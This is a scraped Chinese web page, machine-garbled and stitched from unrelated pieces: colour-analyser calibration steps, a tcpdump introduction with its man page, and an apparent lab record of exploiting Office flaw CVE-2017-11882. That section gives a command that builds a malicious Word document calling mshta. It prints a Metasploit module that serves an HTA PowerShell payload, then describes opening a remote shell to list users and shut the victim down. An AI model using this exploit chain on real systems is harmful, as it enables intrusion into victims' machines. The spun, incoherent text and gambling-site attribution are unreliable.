CA210彩分仪校准步骤,抓包工具

环境:VMware-Workstation-12-Pro,Windows-10,CentOS-6.9-x86_64,Xshell5

1.menu(space key)
2.space (08307009 U) 按键2次)->(EXT)
3.BLUE(按键4次)->PAL
4.enter
5.0校准(0照准CAL(按住探头)现身数字后按校准键 校准后探头再次来到原地点卡塔尔国
6.筛选通道上键

 

主导介绍

tcpdump是Linux自带的抓包工具,能够详细察看Computer通讯中详细报文内容,借使读者熟知另大器晚成款
强硬的抓包工具wireshark,tcpdump约等于是wireshark的命令行版本。dump那一个单词有垃圾堆,
倒垃圾的意思,在微处理机意国语中的含义是转存。

tcpdump官网:
This is the official web site of tcpdump, a powerful command-line packet analyzer;

翻开本机tcpdump的版本

[root@as4k html]# tcpdump --version  
tcpdump version 4.1-PRE-CVS_2017_03_21  

tcpdump的新式版本
Version: 4.9.2
Release Date: September 3, 2017

合克罗地亚语档:
的学科,比比较多大拿的博客都有借鉴此文的剧情。

Office掩盖17年的漏洞CVE_2017_11882测量试验记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参谋文章1:

仿照效法作品2:

 

POC地址:

 

中间环节现身,msf连接数据库退步的情状,解除措施:

 

1.创造规范

 

 

此地搭建两台虚构机实行测量试验!

 

测量试验机配置音信:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

首先在kali下安装nginx,也许tomcat应该也是足以的,首先将扭转的doc文件放在/usr/share/nginx/html目录下,方便被大张讨伐的机械获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta ;; -o cev2.doc

# 将下载好的尾巴模块放在msf任意目录下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_11882.rb的开始和结果如下:

##

# This module requires Metasploit:

# Current source:

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe "#{url}"")

  end

 

然后,这里在行使msfconsole早先,要求先张开数据库,举个例子 service postgresql start 

开垦数据库之后,步向msfconsole,然后对msf实行初阶化,试行msf init

之后search cve_2017_11882招来漏洞模块,然后遵照【参照他事他说加以考察小说2】实行安排,最终exploit 之后运转对 8080 端口的监听,至于何以是8080端口作者也不太掌握啊!

 

2.有备无患,只欠东风

 

以当时候,只须求在 win7 上经过浏览器的到 cve2.doc文书档案,展开现在,kali中命令行立时突显已经收获到了连年,

图片 1

图片 2

session命令获得回答,session -i 【id】创设连接

shell命令可以拿走cmd,实施net user查看客户

图片 3

图片 4

 

3.实验效果

 

通过这些漏洞,能够所行无忌的实行一些发令,举例关机,删除一些文件,收罗一些连串消息仍旧非常管用的

在桌面新建文件夹

图片 5

远程关机

图片 6

固然如此赢拿到了命令行,但是经过net user命令能够看看登陆的顾客品级是Guest,那就节制了部分内需权限较高的下令试行!

再正是这里win7未有安装杀软,笔者不知道安装杀软之后word文书档案会不会被查杀呢?

 

 

那是如何鬼

TCPDUMP(8)                                                          TCPDUMP(8)  

NAME  
       tcpdump - dump traffic on a network  

SYNOPSIS  
       tcpdump [ -AdDefIJKlLnNOpqRStuUvxX ] [ -B buffer_size ] [ -c count ]  
               [ -C file_size ] [ -G rotate_seconds ] [ -F file ]  
               [ -i interface ] [ -j tstamp_type ] [ -m module ] [ -M secret ]  
               [ -Q|-P in|out|inout ]  
               [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ]  
               [ -W filecount ]  
               [ -E spi@ipaddr algo:secret,...  ]  
               [ -y datalinktype ] [ -z postrotate-command ] [ -Z user ]  
               [ expression ]  

上边是tcpdump,man page里面包车型大巴开始和结果,oh my god!这么多参数,本文当然不容许逐条介绍上边包车型客车剧情,
我们先直接通过有个别简短的案例看看效果,然后交由一些广大参数的用法。

本文由澳门新葡亰平台官网发布于操作系统,转载请注明出处:CA210彩分仪校准步骤,抓包工具

TAG标签:
Ctrl+D 将本页面保存为书签,全面了解最新资讯,方便快捷。